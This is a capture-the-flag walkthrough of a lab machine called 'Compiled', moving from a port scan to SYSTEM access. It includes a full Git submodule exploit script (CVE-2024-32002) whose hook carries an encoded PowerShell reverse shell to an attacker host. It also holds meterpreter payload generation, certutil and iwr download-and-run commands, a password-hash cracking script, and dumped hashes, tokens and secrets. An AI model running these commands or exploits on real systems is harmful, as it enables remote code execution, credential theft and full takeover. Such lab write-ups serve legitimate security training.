Compiled

Recon

nmap_scan.log

.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.26:3000
Open 10.10.11.26:5000
Open 10.10.11.26:5985
Open 10.10.11.26:7680
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -vvv -sV -sC -Pn" on ip 10.10.11.26
Depending on the complexity of the script, results may take some time to appear.
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2024-07-28 19:24 UTC
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:24
Completed NSE at 19:24, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:24
Completed NSE at 19:24, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:24
Completed NSE at 19:24, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 19:24
Completed Parallel DNS resolution of 1 host. at 19:24, 0.04s elapsed
DNS resolution of 1 IPs took 0.04s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 19:24
Scanning 10.10.11.26 [4 ports]
Discovered open port 5985/tcp on 10.10.11.26
Discovered open port 3000/tcp on 10.10.11.26
Discovered open port 5000/tcp on 10.10.11.26
Discovered open port 7680/tcp on 10.10.11.26
Completed Connect Scan at 19:24, 0.08s elapsed (4 total ports)
Initiating Service scan at 19:24
Scanning 4 services on 10.10.11.26
Service scan Timing: About 50.00% done; ETC: 19:25 (0:00:50 remaining)
Service scan Timing: About 75.00% done; ETC: 19:26 (0:00:32 remaining)
Completed Service scan at 19:25, 98.83s elapsed (4 services on 1 host)
NSE: Script scanning 10.10.11.26.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:25
Completed NSE at 19:25, 5.20s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:25
Completed NSE at 19:25, 1.11s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:25
Completed NSE at 19:25, 0.00s elapsed
Nmap scan report for 10.10.11.26
Host is up, received user-set (0.079s latency).
Scanned at 2024-07-28 19:24:07 UTC for 106s

PORT     STATE SERVICE    REASON  VERSION
3000/tcp open  ppp?       syn-ack
| fingerprint-strings: 
|   GenericLines, Help, RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Content-Type: text/html; charset=utf-8
|     Set-Cookie: i_like_gitea=815377d51352f4b6; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=4MohAr909PqaiS7QWFYKqQSeWCg6MTcyMjE5NDY1MzY4MTQ3NjUwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Sun, 28 Jul 2024 19:24:13 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-arc-green">
|     <head>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <title>Git</title>
|     <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR2l0Iiwic2hvcnRfbmFtZSI6IkdpdCIsInN0YXJ0X3VybCI6Imh0dHA6Ly9naXRlYS5jb21waWxlZC5odGI6MzAwMC8iLCJpY29ucyI6W3sic3JjIjoiaHR0cDovL2dpdGVhLmNvbXBpbGVkLmh0YjozMDAwL2Fzc2V0cy9pbWcvbG9nby5wbmciLCJ0eXBlIjoiaW1hZ2UvcG5nIiwic2l6ZXMiOiI1MTJ4NTEyIn0seyJzcmMiOiJodHRwOi8vZ2l0ZWEuY29tcGlsZWQuaHRiOjMwMDA
|   HTTPOptions: 
|     HTTP/1.0 405 Method Not Allowed
|     Allow: HEAD
|     Allow: GET
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Set-Cookie: i_like_gitea=bdf03632a610e1db; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=rDK7F0Pl67xeAlHlmxNsic5G-Xo6MTcyMjE5NDY2MTI5MjcwOTQwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Sun, 28 Jul 2024 19:24:21 GMT
|_    Content-Length: 0
5000/tcp open  upnp?      syn-ack
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Server: Werkzeug/3.0.3 Python/3.12.3
|     Date: Sun, 28 Jul 2024 19:24:13 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 5234
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="UTF-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Compiled - Code Compiling Services</title>
|     <!-- Bootstrap CSS -->
|     <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
|     <!-- Custom CSS -->
|     <style>
|     your custom CSS here */
|     body {
|     font-family: 'Ubuntu Mono', monospace;
|     background-color: #272822;
|     color: #ddd;
|     .jumbotron {
|     background-color: #1e1e1e;
|     color: #fff;
|     padding: 100px 20px;
|     margin-bottom: 0;
|     .services {
|   RTSPRequest: 
|     <!DOCTYPE HTML>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: 400 - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
5985/tcp open  http       syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp open  pando-pub? syn-ack
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:25
Completed NSE at 19:25, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:25
Completed NSE at 19:25, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:25
Completed NSE at 19:25, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.49 seconds

Gitea (3000)

Writeup.png

Seems like we have access to source code of webapp on port 5000?

Writeup-1.png

Great, that does seem to be the case. But the exploit will need Visual Studio :/

## Usage

Once the application is up and running, follow these steps to compile your projects:

1. Open your web browser and navigate to `http://localhost:5000`.
2. Enter the URL of your GitHub repository (must be a valid URL starting with `http://` and ending with `.git`).
3. Click the **Submit** button.
4. Wait for the compilation process to complete and view the results.
...
## Notes

**Important:** Before pushing the project to production, ensure that Visual Studio is updated to the latest version. This is necessary to avoid any compatibility issues or bugs that may arise from using outdated versions of Visual Studio.

Gitea creds: test02:test02@compilation.htb:test02test02

Users:

Writeup-2.png

HTTP (5000)

As we saw in the code we are able to send git repository link, it will get cloned and it will get compiled, after that ???

After some trial and error I decided to review the request (should have been the first thing!)

└─$ listen 80
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from 10.10.11.26:57300.
GET /letmein.git/info/refs?service=git-upload-pack HTTP/1.1
Host: 10.10.14.37
User-Agent: git/2.45.0.windows.1
Accept: */*
Accept-Encoding: deflate, gzip, br, zstd
Pragma: no-cache
Git-Protocol: version=2

The request took like 1-2minute to arrive.

---

Note from the future:

READ THE FUCKING GIVEN FILES

Writeup-6.png

---

Searching for git version: Security Advisory 2024-046: Multiple Vulnerabilities in Git

1. The vulnerability CVE-2024-32002, with a CVSS score of 9.1, could allow a remote attacker to execute code on the affected device. To do so, an attacker would need to craft repositories with submodules in a way that exploits a bug in Git whereby it can be fooled into writing files not into the submodule's worktree but into a .git/ directory. This allows writing a hook that will be executed while the clone operation is still running, giving the user no opportunity to inspect the code that is being executed.

2. The vulnerability CVE-2024-32004, with a CVSS score of 8.2, could allow an attacker, on multi-user machines, to create a local repository that appears as a partial clone that is missing an object. Then, when this repository is cloned, it causes Git to execute arbitrary code with the full permissions of the user performing the clone.

3. The vulnerability CVE-2024-32465, with a CVSS score of 7.4, could allow an attacker to bypass protections for cloning untrusted repositories. While this vulnerability has been covered in CVE-2024-32004, there are circumstances where the fixes for CVE-2024-32004 are not enough, e.g., when obtaining a .zip file containing a full copy of a Git repository, it should not be trusted by default to be safe, as e.g., hooks could be configured to run within the context of that repository.

PoC: CVE-2024-32002: Exploiting Git RCE via git clone Blog: Exploiting CVE-2024-32002: RCE via git clone

Reverse Shell (Richard)

After some brainfuckery I rewrote script a bit and managed to get shell!

#!/bin/bash

cleanup() {
    /bin/rm -rf captain/ hook/ hooked/ 2>/dev/null
}

setup() {
    # Define the tell-tale path
    tell_tale_path="$PWD/tell.tale"

    # Set Git configuration options
    git config --global protocol.file.allow always
    git config --global core.symlinks true
    git config --global init.defaultBranch main 
}

init_hook() {
    # Initialize the hook repository
    git init hook
    cd hook
    git remote add origin $hook_repo_path
    mkdir -p y/hooks

# Write the malicious code to a hook
cat > y/hooks/post-checkout <<EOF
#!/bin/bash
echo "hallo????" > /tmp/pwnd
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMwA3ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==
EOF

    # Make the hook executable: important
    chmod +x y/hooks/post-checkout

    git add y/hooks/post-checkout
    git commit -m "post-checkout"
    git push origin main -f
    cd ..
}

init_captain() {
    # Initialize the captain repository
    git init captain
    cd captain
    git remote add origin $captain_repo_path
    git submodule add --name x/y "$hook_repo_path" A/modules/x
    git commit -m "add-submodule"

    # Create a symlink
    printf ".git" > dotgit.txt
    git hash-object -w --stdin < dotgit.txt > dot-git.hash
    printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info
    git update-index --index-info < index.info
    git commit -m "add-symlink"
    git push origin main -f
    cd ..
}

exploit() {
    # Local testing
    git clone --recursive captain hooked
}

# Define repository path
hook_repo_path="http://10.10.11.26:3000/test02/letmein1.git"
captain_repo_path="http://10.10.11.26:3000/test02/letmein2.git"

cleanup
echo "[+] cleanup complete"
setup
echo "[+] setup complete"
init_hook
echo "[+] init_hook complete"
init_captain
echo "[+] init_captain complete"
echo "[!] Done"

You need to create repositories on Gitea, first for hook and second for exploit (captain). hooked repo is actual exploit, which the app does for you.

TL;DR => Create repositories -> Run script -> Send captain git link to webapp -> wait few seconds -> profit

Oddly enough we are in bash, even tho I triggered powershell reverse shell... hmmm...

PS C:\Users> echo $ENV:SHELL
C:\Program Files\Git\usr\bin\bash.exe

Information about user:

PS C:\Users\Richard> C:\Windows\System32\whoami.exe /all
User Name        SID
================ =============================================
compiled\richard S-1-5-21-4093338461-994521390-3704224775-1002

Group Name                                   Type             SID          Attributes
============================================ ================ ============ ==================================================
Todos                                        Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users                Alias            S-1-5-32-559 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                                Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH                           Well-known group S-1-5-3      Mandatory group, Enabled by default, Enabled group
INICIO DE SESIÓN EN LA CONSOLA               Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Usuarios autentificados         Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Esta compañía                   Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Cuenta local                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                        Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Autenticación NTLM              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Etiqueta obligatoria\Nivel obligatorio medio Label            S-1-16-8192

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

Winpeas:

PS C:\users\public> iwr 10.10.14.37/wp.exe -outfile wp.exe
PS C:\users\public> .\wp.exe | tee-object -filepath wp.log
...
════════════════════════════════════╣ Services Information ╠════════════════════════════════════
  [X] Exception: Cannot open Service Control Manager on computer '.'. This operation might require other privileges.
...
=================================================================================================

Gitea(Gitea)["C:\Program Files\gitea\gitea.exe" web --config "C:\Program Files\gitea\custom\conf\app.ini"] - Autoload
File Permissions: Richard [AllAccess]
Possible DLL Hijacking in binary folder: C:\Program Files\gitea (Richard [AllAccess])
Gitea
=================================================================================================
...
╔══════════╣ Installed Applications --Via Program Files/Uninstall registry--
╚ Check if you can modify installed software https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#software
    C:\Program Files (x86)\Microsoft Visual Studio\Installer
    ...
    C:\Program Files\Gitea(Richard [AllAccess])
    ...
    C:\Program Files\Python312
	...

Gitea (Internal)

Gitea configuration:

PS C:\Program Files\gitea\custom\conf> cat app.ini
RUN_USER = COMPILED\Richard
APP_NAME = Git
RUN_MODE = prod
WORK_PATH = C:\Program Files\gitea

[ui]
DEFAULT_THEME = arc-green

[database]
DB_TYPE = sqlite3
HOST = 127.0.0.1:3306
NAME = gitea
USER = gitea
PASSWD =
SCHEMA =
SSL_MODE = disable
PATH = C:\Program Files\gitea\data\gitea.db
LOG_SQL = false

[repository]
ROOT = C:/Program Files/gitea/data/gitea-repositories

[server]
SSH_DOMAIN = gitea.compiled.htb
DOMAIN = gitea.compiled.htb
HTTP_PORT = 3000
ROOT_URL = http://gitea.compiled.htb:3000/
APP_DATA_PATH = C:\Program Files\gitea/data
DISABLE_SSH = false
SSH_PORT = 22
LFS_START_SERVER = true
LFS_JWT_SECRET = ten8FWelzw36S77bYSUGlVCmrZn4jncN1ekaH1NoXO4
OFFLINE_MODE = false

[lfs]
PATH = C:/Program Files/gitea/data/lfs

[mailer]
ENABLED = false

[service]
REGISTER_EMAIL_CONFIRM = false
ENABLE_NOTIFY_MAIL = false
DISABLE_REGISTRATION = false
ALLOW_ONLY_EXTERNAL_REGISTRATION = false
ENABLE_CAPTCHA = false
REQUIRE_SIGNIN_VIEW = false
DEFAULT_KEEP_EMAIL_PRIVATE = false
DEFAULT_ALLOW_CREATE_ORGANIZATION = true
DEFAULT_ENABLE_TIMETRACKING = true
NO_REPLY_ADDRESS = noreply.localhost

[openid]
ENABLE_OPENID_SIGNIN = true
ENABLE_OPENID_SIGNUP = true

[cron.update_checker]
ENABLED = false

[session]
PROVIDER = file

[log]
MODE = console
LEVEL = info
ROOT_PATH = C:/Program Files/gitea/log

[repository.pull-request]
DEFAULT_MERGE_STYLE = merge

[repository.signing]
DEFAULT_TRUST_MODEL = committer

[security]
INSTALL_LOCK = true
INTERNAL_TOKEN = eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYmYiOjE3MTY0MDEzMDR9.oQ3gsIgAi1_JTKKbw0lCKjwfcB3v7HvH6Wzb6M7dkE0
PASSWORD_HASH_ALGO = pbkdf2

[oauth2]
JWT_SECRET = XCXy54fFBqA-KAHA0Cjn5wp1gO4l-LY2-qgCS58VJO0

The Gitea has a database at C:\Program Files\gitea\data\gitea.db, I upgraded the shell to ConPtyShell so I was able to open HTTP server with python and exfiltrate file. Interesting table is user which contains user passwords:

Writeup-3.png

└─$ sqlite3 ./gitea.db
SQLite version 3.45.1 2024-01-30 16:01:20
sqlite> SELECT email, passwd, salt FROM user WHERE email LIKE '%compiled.htb';
administrator@compiled.htb|1bf0a9561cf076c5fc0d76e140788a91b5281609c384791839fd6e9996d3bbf5c91b8eee6bd5081e42085ed0be779c2ef86d|a45c43d36dce3076158b19c2c696ef7b
richard@compiled.htb|4b4b53766fe946e7e291b106fcd6f4962934116ec9ac78a99b3bf6b06cf8568aaedd267ec02b39aeb244d83fb8b89c243b5e|d7cf2c96277dd16d95ed5c33bb524b62
emily@compiled.htb|97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16|227d873cca89103cd83a976bdac52486

We already have richard user and from linpeas enumeration he can't do much. emily is another user on system and we should try targeting her.

Practical Cryptography for Developers: https://cryptobook.nakov.com/mac-and-key-derivation/pbkdf2

Privilege Escalation (Emily)

Crack the password:

from cryptography.hazmat.primitives.hashes import SHA256
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC

ITERATIONS = 50_000 # pbkdf2$50000$50
LENGTH = 50
EMAIL = 'emily@compiled.htb'
HASH = '97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16'
SALT = bytes.fromhex('227d873cca89103cd83a976bdac52486')

def encrypt(password, salt):
    return PBKDF2HMAC(
        algorithm=SHA256(),
        length=LENGTH,
        salt=salt,
        iterations=ITERATIONS,
    ).derive(password.encode()).hex()

with open('/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt', encoding='UTF-8', errors="ignore") as f:
    for password in f:
        password = password.strip()
        guess = encrypt(password, SALT)
        print(f'\r{password=}{" "*16}', end='')
        if guess == HASH:
            print('\n\rFound it!')
            break

Luckily the password was easily found. (Use god level encryption methods, but users use weak ass passwords? EMOTIONAL DAMAGE! HumanOS do be trippy)

└─$ py emily.py
password='12345678'                 
Found it!

└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4444 -f exe -o rev.exe
---
msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST tun0
msf6 exploit(multi/handler) > run
---
PS C:\users\public> iwr 10.10.14.37/RunasCs.exe -outfile rc.exe
PS C:\users\public> iwr 10.10.14.37/rev.exe -outfile rev.exe
PS C:\users\public> .\rc.exe emily 12345678 \Users\Public\rev.exe
---
meterpreter > getuid
Server username: COMPILED\Emily
meterpreter > shell
Process 2952 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19045.4651]
C:\Windows\system32>cd %userprofile%
cd %userprofile%

C:\Users\Emily>tree /f /a
tree /f /a
Folder PATH listing
Volume serial number is 352B-98C6
C:.
+---.idlerc
|       recent-files.lst
|
+---3D Objects
+---Contacts
+---Desktop
|       user.txt
|
+---Documents
|   \---Visual Studio 2019
|       \---Templates
|           +---ItemTemplates
|           |   \---Extensibilidad
|           \---ProjectTemplates
|               \---Extensibilidad
+---Downloads
+---Favorites
|   |   Bing.url
|   |
|   \---Links
+---Links
|       Desktop.lnk
|       Downloads.lnk
|
+---Music
+---OneDrive
+---Pictures
|   +---Camera Roll
|   \---Saved Pictures
+---Saved Games
+---Searches
|       winrt--{S-1-5-21-4093338461-994521390-3704224775-1001}-.searchconnector-ms
|
+---source
|   \---repos
\---Videos
    \---Captures

User.txt

C:\Users\Emily>type Desktop\user.txt
1c50f492d18f7b33db437efe72f60b30

Privilege Escalation (Administrator)

C:\Users\Emily>whoami /all
User Name      SID
============== =============================================
compiled\emily S-1-5-21-4093338461-994521390-3704224775-1001

Group Name                                   Type             SID          Attributes
============================================ ================ ============ ==================================================
Todos                                        Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users              Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                                Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users                Alias            S-1-5-32-559 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                     Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
INICIO DE SESIN EN LA CONSOLA               Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Usuarios autentificados         Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Esta compaa                   Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Cuenta local                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Autenticacin NTLM              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Etiqueta obligatoria\Nivel obligatorio medio Label            S-1-16-8192

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

Upload and run winpeas again. During enumeration phase script died due to NFS Export Files? Considering the name of box it's worth looking into.

Writeup-4.png

Get version of VS: (src)

C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE>"C:\Program Files (x86)\Microsoft Visual Studio\Installer\vswhere.exe" -property catalog_productDisplayVersion
16.10.0

Dotnet version:

C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE>reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\full" /v version

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\full
    version    REG_SZ    4.8.09037

Check the directory pointed by winpeas

C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Web\Exports>dir
01/20/2024  03:03 AM    <DIR>          es
01/20/2024  03:03 AM               953 extension.vsixmanifest
01/20/2024  03:03 AM            36,240 Microsoft.VisualStudio.Web.Exports.dll
01/20/2024  03:03 AM               294 Microsoft.VisualStudio.Web.Exports.pkgdef
               3 File(s)         37,487 bytes
               3 Dir(s)   7,200,944,128 bytes free

C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Web\Exports>type extension.vsixmanifest
<?xml version="1.0" encoding="utf-8"?>
<Vsix Version="1.0.0" xmlns="http://schemas.microsoft.com/developer/vsx-schema/2010">
  <Identifier Id="Microsoft.VisualStudio.Web.Exports">
    <Name>Microsoft Visual Studio Web Exports</Name>
    <Author>Microsoft Corporation</Author>
    <Version>15.0</Version>
    <Description>Microsoft Visual Studio Web Exports</Description>
    <Locale>1033</Locale>
    <SupportedProducts>
      <VisualStudio Version="15.0">
        <Edition>Premium</Edition>
        <Edition>Express_All</Edition>
      </VisualStudio>
    </SupportedProducts>
    <SupportedFrameworkRuntimeEdition MinVersion="4.0" MaxVersion="4.0" />
    <InstalledByMsi>true</InstalledByMsi>
    <SystemComponent>true</SystemComponent>
    <AllowClientRole>true</AllowClientRole>
  </Identifier>
  <References />
  <Content>
    <MefComponent>Microsoft.VisualStudio.Web.Exports.dll</MefComponent>
  </Content>
</Vsix>

After following some conversations it turns out root privilege escalation need CVE.

Microsoft » Visual Studio : Security Vulnerabilities, CVEs

CVE-2024-38081 was first choice as it was Elevation of Privilege Vulnerability, but description of this CVE was garbage! The only valid description I found was Defused > CVE-2024-38081

Next was CVE-2024-20656 which has beautiful post explaining everything in details: mdsec > CVE-2024-20656 – Local Privilege Escalation in the VSStandardCollectorService150 Service, and there's also PoC: https://github.com/Wh04m1001/CVE-2024-20656

Richard didn't have ability to query VSStandardCollectorService150, but Emily does:

C:\Users\Public>sc.exe qc VSStandardCollectorService150
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: VSStandardCollectorService150
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : "C:\Program Files (x86)\Microsoft Visual Studio\Shared\Common\DiagnosticsHub.Collection.Service\StandardCollector.Service.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Visual Studio Standard Collector Service 150
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

Find the VSDiagnostics.exe full path and update path in PoC

PS C:\Users\Public> ls / -file -recurse -filter VSDiagnostics.exe -ErrorAction SilentlyContinue

    Directory: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Team Tools\DiagnosticsHub\Collector


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         1/20/2024   2:04 AM         124840 VSDiagnostics.exe

Make relevant changes:

Writeup-5.png

Note: Make sure to change build to Release mode! Debug kept failing...

C:\Users\Public>certutil.exe -urlcache -f http://10.10.14.37/Expl.exe exp.exe # cmd
certutil.exe -urlcache -f http://10.10.14.37/Expl.exe exp.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

C:\Users\Public>.\exp.exe
.\exp.exe
[+] Junction \\?\C:\44ea58f2-d0a4-484e-858c-abf4dd2b009e -> \??\C:\d0461bb7-bbe8-4fe6-903f-a2ebc72673a1 created!
[+] Symlink Global\GLOBALROOT\RPC Control\Report.0197E42F-003D-4F91-A845-6404CF289E84.diagsession -> \??\C:\Programdata created!
[+] Junction \\?\C:\44ea58f2-d0a4-484e-858c-abf4dd2b009e -> \RPC Control created!
[+] Junction \\?\C:\44ea58f2-d0a4-484e-858c-abf4dd2b009e -> \??\C:\d0461bb7-bbe8-4fe6-903f-a2ebc72673a1 created!
[+] Symlink Global\GLOBALROOT\RPC Control\Report.0297E42F-003D-4F91-A845-6404CF289E84.diagsession -> \??\C:\Programdata\Microsoft created!
[+] Junction \\?\C:\44ea58f2-d0a4-484e-858c-abf4dd2b009e -> \RPC Control created!
[+] Persmissions successfully reseted!
[*] Starting WMI installer.
[*] Command to execute: C:\windows\system32\msiexec.exe /fa C:\windows\installer\8ad86.msi
[*] Oplock!
[+] File moved!

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.37:4444
[*] Sending stage (201798 bytes) to 10.10.11.26
[*] Meterpreter session 7 opened (10.10.14.37:4444 -> 10.10.11.26:60049) at 2024-07-31 06:09:52 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 1056 created.
Channel 1 created.
Microsoft Windows [Versin 10.0.19045.4651]
(c) Microsoft Corporation. Todos los derechos reservados.

C:\ProgramData\Microsoft\VisualStudio\SetupWMI>cd \users\administrator
C:\Users\Administrator>tree /f /a
Listado de rutas de carpetas
El nmero de serie del volumen es 352B-98C6
C:.
|   .gitconfig
|
+---.idlerc
|       breakpoints.lst
|       recent-files.lst
|
+---3D Objects
+---Contacts
+---Desktop
|       root.txt
|
+---Documents
+---Downloads
+---Favorites
